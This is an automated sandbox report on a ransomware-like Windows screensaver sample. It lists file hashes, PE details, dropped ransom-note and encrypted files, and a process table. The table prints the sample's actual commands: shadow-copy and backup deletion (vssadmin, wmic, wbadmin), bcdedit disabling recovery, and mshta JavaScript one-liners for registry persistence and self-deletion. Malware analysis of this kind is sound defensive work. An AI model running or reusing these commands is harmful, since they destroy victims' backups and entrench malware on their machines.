analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Апрель.scr

Full analysis: https://app.any.run/tasks/098e9a32-e6d3-4a81-8bdc-752b11429c8b
Verdict: Malicious activity
Analysis date: April 25, 2019, 14:30:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

4ACE2A8B80DF6C18D070511863CA5A7C

SHA1:

1DD97E0221C14502AD49C2BF14CDDE7B9EDB816D

SHA256:

57C1BC3129B2CAA0E9E499EFDF68AFA23AD86AA66BF9B315B1F5630E67B4F960

SSDEEP:

6144:mtDy8tihpRtgyVZjZR7y4dJFmFDoQ2vhCclo:mtvtihp5Dy4dJLCT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Deletes shadow copies

      • cmd.exe (PID: 5684)
      • cmd.exe (PID: 3528)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 6064)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 6060)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • Апрель.scr (PID: 3904)
      • mshta.exe (PID: 5480)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • int.exe (PID: 5552)
      • Апрель.scr (PID: 3904)
    • Creates files in the user directory

      • cmd.exe (PID: 5984)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 5984)
    • Starts itself from another location

      • Апрель.scr (PID: 3904)
    • Creates files in the program directory

      • int.exe (PID: 5552)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 5480)
      • mshta.exe (PID: 6060)
      • mshta.exe (PID: 5712)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x1493
UninitializedDataSize: -
InitializedDataSize: 89600
CodeSize: 306688
LinkerVersion: 6.6
PEType: PE32
TimeStamp: 2019:04:23 01:24:59+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 22-Apr-2019 23:24:59
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 22-Apr-2019 23:24:59
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0004ADBE
0x0004AE00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
5.90745
.data
0x0004C000
0x00000DB4
0x00000E00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
2.93007
.rsrc
0x0004D000
0x00014C3C
0x00014E00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.33259
.IT
0x00062000
0x000000C8
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
1.19669
0x00073000
0x00000100
0x00000200
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0

Resources

Title
Entropy
Size
Codepage
Language
Type
1
0
88
Latin 1 / Western European
UNKNOWN
RT_RCDATA
2
4.79597
346
Latin 1 / Western European
English - United States
RT_MANIFEST
3
6.13568
89
Latin 1 / Western European
UNKNOWN
RT_RCDATA
4
0
97
Latin 1 / Western European
UNKNOWN
RT_RCDATA
5
6.24335
93
Latin 1 / Western European
UNKNOWN
RT_RCDATA
6
0
55
Latin 1 / Western European
UNKNOWN
RT_RCDATA
7
0
86
Latin 1 / Western European
UNKNOWN
RT_RCDATA
8
6.17045
86
Latin 1 / Western European
UNKNOWN
RT_RCDATA

Imports

imagehlp.dll
kernel32.dll
msimg32.dll
ole32.dll
oleaut32.dll
shlwapi.dll
user32.dll
winmm.dll
winspool.drv
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
16
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start апрель.scr no specs cmd.exe int.exe no specs mshta.exe no specs mshta.exe mshta.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wbadmin.exe no specs wmic.exe no specs vssadmin.exe no specs bcdedit.exe no specs bcdedit.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3904"C:\Users\admin\AppData\Local\Temp\Апрель.scr" /SC:\Users\admin\AppData\Local\Temp\Апрель.screxplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
5984"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\admin\AppData\Local\Temp\Апрель.scr" "C:\Users\admin\AppData\Roaming\int.exe"C:\Windows\system32\cmd.exe
Апрель.scr
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
5552"C:\Users\admin\AppData\Roaming\int.exe" C:\Users\admin\AppData\Roaming\int.exeАпрель.scr
User:
admin
Integrity Level:
MEDIUM
5712mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Апрель.scr');close()}catch(e){}},10);"C:\Windows\system32\mshta.exeАпрель.scr
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
6060mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('int.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\oEoNYywSQciQwl',i);}catch(e){}},10);"C:\Windows\system32\mshta.exe
int.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
5480mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\[EHXU\\AVZAP'));close();"C:\Windows\system32\mshta.exeint.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
5464"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967293
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
5684"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETEC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2147749908
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3528"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /QuietC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
6064"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled NoC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 809
Read events
568
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
0
Text files
190
Unknown types
0

Dropped files

PID
Process
Filename
Type
5552int.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\я
MD5:
SHA256:
5552int.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\Benioku.htm
MD5:
SHA256:
5552int.exe\Device\HarddiskVolume2\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\oouVlFoLneQ8WWyJqRpZJT6NjGp7Nk.bbbfl
MD5:
SHA256:
5552int.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\Berime.htm
MD5:
SHA256:
5552int.exe\Device\HarddiskVolume2\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\h3rK0f0hzrN6bkcSj0Nx+Nt8Htk.bbbfl
MD5:
SHA256:
5552int.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\IrakHau.htm
MD5:
SHA256:
5552int.exe\Device\HarddiskVolume2\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\Ot+wBI5qmZ8X6YjjsvXGPo5=pu+psk.bbbfl
MD5:
SHA256:
5552int.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\Leame.htm
MD5:
SHA256:
5552int.exe\Device\HarddiskVolume2\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\VFPz5LIFQFCwpeICK4dF3yRg.bbbfl
MD5:
SHA256:
5552int.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Adobe\Acrobat Reader DC\LeesMij.htm
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info